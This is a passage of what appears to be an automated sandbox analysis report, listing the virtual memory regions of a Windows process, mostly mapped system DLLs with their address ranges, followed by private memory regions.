= 0x6f5c0000 region_type = mapped_file name = "wdscore.dll" filename = "\\Windows\\System32\\wdscore.dll" (normalized: "c:\\windows\\system32\\wdscore.dll") Region: id = 23208 start_va = 0x6f600000 end_va = 0x6f632fff entry_point = 0x6f600000 region_type = mapped_file name = "sqmapi.dll" filename = "\\Windows\\System32\\sqmapi.dll" (normalized: "c:\\windows\\system32\\sqmapi.dll") Region: id = 23209 start_va = 0x6f640000 end_va = 0x6f6bcfff entry_point = 0x6f640000 region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 23210 start_va = 0x6f770000 end_va = 0x6f7bdfff entry_point = 0x6f770000 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 23211 start_va = 0x6f7c0000 end_va = 0x6f81bfff entry_point = 0x6f7c0000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 23212 start_va = 0x6f820000 end_va = 0x6f84afff entry_point = 0x6f820000 region_type = mapped_file name = "wmisvc.dll" filename = "\\Windows\\System32\\wbem\\WMIsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wmisvc.dll") Region: id = 23213 start_va = 0x6f900000 end_va = 0x6f90bfff entry_point = 0x6f900000 region_type = mapped_file name = "mspatcha.dll" filename = "\\Windows\\System32\\mspatcha.dll" (normalized: "c:\\windows\\system32\\mspatcha.dll") Region: id = 23214 start_va = 0x6fcf0000 end_va = 0x6fd3efff entry_point = 0x6fcf0000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 23215 start_va = 0x6fd40000 end_va = 0x6fd97fff entry_point = 0x6fd40000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: 
"c:\\windows\\system32\\winhttp.dll") Region: id = 23216 start_va = 0x70200000 end_va = 0x70250fff entry_point = 0x70200000 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 23217 start_va = 0x70370000 end_va = 0x7037ffff entry_point = 0x70370000 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 23218 start_va = 0x70380000 end_va = 0x70495fff entry_point = 0x70380000 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 23219 start_va = 0x704a0000 end_va = 0x704a5fff entry_point = 0x704a0000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 23220 start_va = 0x70500000 end_va = 0x70507fff entry_point = 0x70500000 region_type = mapped_file name = "tschannel.dll" filename = "\\Windows\\System32\\TSChannel.dll" (normalized: "c:\\windows\\system32\\tschannel.dll") Region: id = 23221 start_va = 0x71e70000 end_va = 0x71e7efff entry_point = 0x71e70000 region_type = mapped_file name = "appinfo.dll" filename = "\\Windows\\System32\\appinfo.dll" (normalized: "c:\\windows\\system32\\appinfo.dll") Region: id = 23222 start_va = 0x72450000 end_va = 0x7247ffff entry_point = 0x72450000 region_type = mapped_file name = "tcpipcfg.dll" filename = "\\Windows\\System32\\tcpipcfg.dll" (normalized: "c:\\windows\\system32\\tcpipcfg.dll") Region: id = 23223 start_va = 0x72480000 end_va = 0x72496fff entry_point = 0x72480000 region_type = mapped_file name = "rascfg.dll" filename = "\\Windows\\System32\\rascfg.dll" (normalized: "c:\\windows\\system32\\rascfg.dll") Region: id = 23224 start_va = 0x725e0000 end_va = 0x725ecfff entry_point = 0x725e0000 region_type = 
mapped_file name = "ndiscapcfg.dll" filename = "\\Windows\\System32\\ndiscapCfg.dll" (normalized: "c:\\windows\\system32\\ndiscapcfg.dll") Region: id = 23225 start_va = 0x72670000 end_va = 0x72698fff entry_point = 0x72670000 region_type = mapped_file name = "mprapi.dll" filename = "\\Windows\\System32\\mprapi.dll" (normalized: "c:\\windows\\system32\\mprapi.dll") Region: id = 23226 start_va = 0x73260000 end_va = 0x732acfff entry_point = 0x73260000 region_type = mapped_file name = "taskcomp.dll" filename = "\\Windows\\System32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll") Region: id = 23227 start_va = 0x73390000 end_va = 0x7339cfff entry_point = 0x73390000 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 23228 start_va = 0x73460000 end_va = 0x734b5fff entry_point = 0x73460000 region_type = mapped_file name = "wbemess.dll" filename = "\\Windows\\System32\\wbem\\wbemess.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemess.dll") Region: id = 23229 start_va = 0x734c0000 end_va = 0x734c8fff entry_point = 0x734c0000 region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll") Region: id = 23230 start_va = 0x734d0000 end_va = 0x73589fff entry_point = 0x734d0000 region_type = mapped_file name = "schedsvc.dll" filename = "\\Windows\\System32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll") Region: id = 23231 start_va = 0x73590000 end_va = 0x7359afff entry_point = 0x73590000 region_type = mapped_file name = "wiarpc.dll" filename = "\\Windows\\System32\\wiarpc.dll" (normalized: "c:\\windows\\system32\\wiarpc.dll") Region: id = 23232 start_va = 0x735a0000 end_va = 0x735a7fff entry_point = 0x735a0000 region_type = mapped_file name = "fvecerts.dll" filename = "\\Windows\\System32\\fvecerts.dll" (normalized: "c:\\windows\\system32\\fvecerts.dll") Region: 
id = 23233 start_va = 0x735b0000 end_va = 0x735b6fff entry_point = 0x735b0000 region_type = mapped_file name = "tbs.dll" filename = "\\Windows\\System32\\tbs.dll" (normalized: "c:\\windows\\system32\\tbs.dll") Region: id = 23234 start_va = 0x735c0000 end_va = 0x73602fff entry_point = 0x735c0000 region_type = mapped_file name = "fveapi.dll" filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll") Region: id = 23235 start_va = 0x73610000 end_va = 0x73661fff entry_point = 0x73610000 region_type = mapped_file name = "shsvcs.dll" filename = "\\Windows\\System32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll") Region: id = 23236 start_va = 0x73670000 end_va = 0x73681fff entry_point = 0x73670000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 23237 start_va = 0x73690000 end_va = 0x7369cfff entry_point = 0x73690000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 23238 start_va = 0x736b0000 end_va = 0x736e7fff entry_point = 0x736b0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 23239 start_va = 0x737c0000 end_va = 0x737c6fff entry_point = 0x737c0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 23240 start_va = 0x737d0000 end_va = 0x737ebfff entry_point = 0x737d0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 23241 start_va = 0x73810000 end_va = 0x7381efff entry_point = 0x73810000 region_type = mapped_file name = "sens.dll" filename = "\\Windows\\System32\\Sens.dll" 
(normalized: "c:\\windows\\system32\\sens.dll") Region: id = 23242 start_va = 0x73820000 end_va = 0x73866fff entry_point = 0x73820000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 23243 start_va = 0x73870000 end_va = 0x73879fff entry_point = 0x73870000 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 23244 start_va = 0x73880000 end_va = 0x73888fff entry_point = 0x73880000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 23245 start_va = 0x73890000 end_va = 0x7389bfff entry_point = 0x73890000 region_type = mapped_file name = "themeservice.dll" filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll") Region: id = 23246 start_va = 0x738a0000 end_va = 0x738b3fff entry_point = 0x738a0000 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 23247 start_va = 0x738c0000 end_va = 0x738eafff entry_point = 0x738c0000 region_type = mapped_file name = "profsvc.dll" filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll") Region: id = 23248 start_va = 0x738f0000 end_va = 0x738fffff entry_point = 0x738f0000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 23249 start_va = 0x73900000 end_va = 0x73992fff entry_point = 0x73900000 region_type = mapped_file name = "gpsvc.dll" filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll") Region: id = 23250 start_va = 0x73b20000 end_va = 0x73b31fff entry_point = 0x73b20000 region_type = mapped_file name = "mmcss.dll" filename = 
"\\Windows\\System32\\mmcss.dll" (normalized: "c:\\windows\\system32\\mmcss.dll") Region: id = 23251 start_va = 0x73b40000 end_va = 0x73b46fff entry_point = 0x73b40000 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 23252 start_va = 0x73c00000 end_va = 0x73c20fff entry_point = 0x73c00000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 23253 start_va = 0x73c30000 end_va = 0x73c3efff entry_point = 0x73c30000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 23254 start_va = 0x73c40000 end_va = 0x73c4efff entry_point = 0x73c40000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 23255 start_va = 0x73c50000 end_va = 0x73c58fff entry_point = 0x73c50000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 23256 start_va = 0x73c60000 end_va = 0x73c70fff entry_point = 0x73c60000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 23257 start_va = 0x73cd0000 end_va = 0x73d50fff entry_point = 0x73cd0000 region_type = mapped_file name = "wmiprvsd.dll" filename = "\\Windows\\System32\\wbem\\WmiPrvSD.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprvsd.dll") Region: id = 23258 start_va = 0x73d60000 end_va = 0x73d6cfff entry_point = 0x73d60000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 23259 start_va = 0x73d70000 end_va = 0x73d7efff 
entry_point = 0x73d70000 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 23260 start_va = 0x73e80000 end_va = 0x73eaefff entry_point = 0x73e80000 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 23261 start_va = 0x741e0000 end_va = 0x7421ffff entry_point = 0x741e0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 23262 start_va = 0x74220000 end_va = 0x74314fff entry_point = 0x74220000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 23263 start_va = 0x74320000 end_va = 0x74331fff entry_point = 0x74320000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 23264 start_va = 0x74360000 end_va = 0x744fdfff entry_point = 0x74360000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 23265 start_va = 0x748d0000 end_va = 0x748d8fff entry_point = 0x748d0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 23266 start_va = 0x748e0000 end_va = 0x74955fff entry_point = 0x748e0000 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 23267 
start_va = 0x74960000 end_va = 0x74964fff entry_point = 0x74960000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 23268 start_va = 0x749e0000 end_va = 0x749eafff entry_point = 0x749e0000 region_type = mapped_file name = "pcwum.dll" filename = "\\Windows\\System32\\pcwum.dll" (normalized: "c:\\windows\\system32\\pcwum.dll") Region: id = 23269 start_va = 0x74a10000 end_va = 0x74a25fff entry_point = 0x74a10000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 23270 start_va = 0x74a30000 end_va = 0x74a46fff entry_point = 0x74a30000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 23271 start_va = 0x74a50000 end_va = 0x74a64fff entry_point = 0x74a50000 region_type = mapped_file name = "spinf.dll" filename = "\\Windows\\System32\\SPInf.dll" (normalized: "c:\\windows\\system32\\spinf.dll") Region: id = 23272 start_va = 0x74af0000 end_va = 0x74b1bfff entry_point = 0x74af0000 region_type = mapped_file name = "ubpm.dll" filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll") Region: id = 23273 start_va = 0x74b20000 end_va = 0x74b27fff entry_point = 0x74b20000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 23274 start_va = 0x74bd0000 end_va = 0x74bddfff entry_point = 0x74bd0000 region_type = mapped_file name = "devrtl.dll" filename = "\\Windows\\System32\\devrtl.dll" (normalized: "c:\\windows\\system32\\devrtl.dll") Region: id = 23275 start_va = 0x74bf0000 end_va = 0x74c2afff entry_point = 0x74bf0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: 
"c:\\windows\\system32\\rsaenh.dll") Region: id = 23276 start_va = 0x74ca0000 end_va = 0x74cc1fff entry_point = 0x74ca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 23277 start_va = 0x74cd0000 end_va = 0x74d13fff entry_point = 0x74cd0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 23278 start_va = 0x74e00000 end_va = 0x74e05fff entry_point = 0x74e00000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 23279 start_va = 0x74e10000 end_va = 0x74e4bfff entry_point = 0x74e10000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 23280 start_va = 0x74e50000 end_va = 0x74e65fff entry_point = 0x74e50000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 23281 start_va = 0x74f20000 end_va = 0x74f4afff entry_point = 0x74f20000 region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 23282 start_va = 0x74f60000 end_va = 0x74f65fff entry_point = 0x74f60000 region_type = mapped_file name = "wmsgapi.dll" filename = "\\Windows\\System32\\wmsgapi.dll" (normalized: "c:\\windows\\system32\\wmsgapi.dll") Region: id = 23283 start_va = 0x74f70000 end_va = 0x74f76fff entry_point = 0x74f70000 region_type = mapped_file name = "sysntfy.dll" filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll") Region: id = 23284 start_va = 0x74fe0000 end_va = 0x74ffafff entry_point = 0x74fe0000 region_type = mapped_file name = 
"authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 23285 start_va = 0x75010000 end_va = 0x75051fff entry_point = 0x75010000 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 23286 start_va = 0x75060000 end_va = 0x75070fff entry_point = 0x75060000 region_type = mapped_file name = "cryptdll.dll" filename = "\\Windows\\System32\\cryptdll.dll" (normalized: "c:\\windows\\system32\\cryptdll.dll") Region: id = 23287 start_va = 0x75220000 end_va = 0x75238fff entry_point = 0x75220000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 23288 start_va = 0x75290000 end_va = 0x75297fff entry_point = 0x75290000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 23289 start_va = 0x752b0000 end_va = 0x752cafff entry_point = 0x752b0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 23290 start_va = 0x752d0000 end_va = 0x752dbfff entry_point = 0x752d0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 23291 start_va = 0x752e0000 end_va = 0x7533efff entry_point = 0x752e0000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 23292 start_va = 0x75340000 end_va = 0x75368fff entry_point = 0x75340000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 23293 start_va = 0x75370000 end_va = 0x7537dfff 
entry_point = 0x75370000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 23294 start_va = 0x75380000 end_va = 0x7538afff entry_point = 0x75380000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 23295 start_va = 0x753f0000 end_va = 0x753fbfff entry_point = 0x753f0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 23296 start_va = 0x75400000 end_va = 0x75411fff entry_point = 0x75400000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 23297 start_va = 0x75420000 end_va = 0x7553cfff entry_point = 0x75420000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 23298 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 23299 start_va = 0x75590000 end_va = 0x755b6fff entry_point = 0x75590000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 23300 start_va = 0x75650000 end_va = 0x7567cfff entry_point = 0x75650000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 23301 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: 
"c:\\windows\\system32\\rpcrt4.dll") Region: id = 23302 start_va = 0x75730000 end_va = 0x75774fff entry_point = 0x75730000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 23303 start_va = 0x75780000 end_va = 0x75802fff entry_point = 0x75780000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 23304 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 23305 start_va = 0x75820000 end_va = 0x75824fff entry_point = 0x75820000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 23306 start_va = 0x75830000 end_va = 0x76479fff entry_point = 0x75830000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 23307 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 23308 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 23309 start_va = 0x764b0000 end_va = 0x7664cfff entry_point = 0x764b0000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 23310 start_va = 0x76750000 end_va = 0x768abfff entry_point = 0x76750000 region_type = mapped_file name = "ole32.dll" filename = 
"\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 23311 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 23312 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 23313 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 23314 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 23315 start_va = 0x76c10000 end_va = 0x76c9efff entry_point = 0x76c10000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 23316 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 23317 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 23318 start_va = 0x76e10000 end_va = 0x76e66fff entry_point = 0x76e10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 23319 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 
region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 23320 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 23321 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 23322 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 23323 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 23324 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 23325 start_va = 0x7ff84000 end_va = 0x7ff84fff entry_point = 0x0 region_type = private name = "private_0x000000007ff84000" filename = "" Region: id = 23326 start_va = 0x7ff85000 end_va = 0x7ff85fff entry_point = 0x0 region_type = private name = "private_0x000000007ff85000" filename = "" Region: id = 23327 start_va = 0x7ff86000 end_va = 0x7ff86fff entry_point = 0x0 region_type = private name = "private_0x000000007ff86000" filename = "" Region: id = 23328 start_va = 0x7ff8a000 end_va = 0x7ff8afff entry_point = 0x0 region_type = private name = "private_0x000000007ff8a000" filename = "" Region: id = 23329 start_va = 0x7ff8b000 end_va = 0x7ff8bfff entry_point = 0x0 region_type = private name = "private_0x000000007ff8b000" filename = "" Region: id = 23330 
start_va = 0x7ff96000 end_va = 0x7ff96fff entry_point = 0x0 region_type = private name = "private_0x000000007ff96000" filename = "" Region: id = 23331 start_va = 0x7ff99000 end_va = 0x7ff99fff entry_point = 0x0 region_type = private name = "private_0x000000007ff99000" filename = "" Region: id = 23332 start_va = 0x7ff9b000 end_va = 0x7ff9bfff entry_point = 0x0 region_type = private name = "private_0x000000007ff9b000" filename = "" Region: id = 23333 start_va = 0x7ff9d000 end_va = 0x7ff9dfff entry_point = 0x0 region_type = private name = "private_0x000000007ff9d000" filename = "" Region: id = 23334 start_va = 0x7ff9e000 end_va = 0x7ff9efff entry_point = 0x0 region_type = private name = "private_0x000000007ff9e000" filename = "" Region: id = 23335 start_va = 0x7ffa0000 end_va = 0x7ffa0fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa0000" filename = "" Region: id = 23336 start_va = 0x7ffa2000 end_va = 0x7ffa2fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa2000" filename = "" Region: id = 23337 start_va = 0x7ffa3000 end_va = 0x7ffa3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa3000" filename = "" Region: id = 23338 start_va = 0x7ffa5000 end_va = 0x7ffa5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa5000" filename = "" Region: id = 23339 start_va = 0x7ffa6000 end_va = 0x7ffa6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa6000" filename = "" Region: id = 23340 start_va = 0x7ffa7000 end_va = 0x7ffa7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa7000" filename = "" Region: id = 23341 start_va = 0x7ffa9000 end_va = 0x7ffa9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa9000" filename = "" Region: id = 23342 start_va = 0x7ffaa000 end_va = 0x7ffaafff entry_point = 0x0 region_type = private name = "private_0x000000007ffaa000" filename = "" Region: id = 23343 start_va = 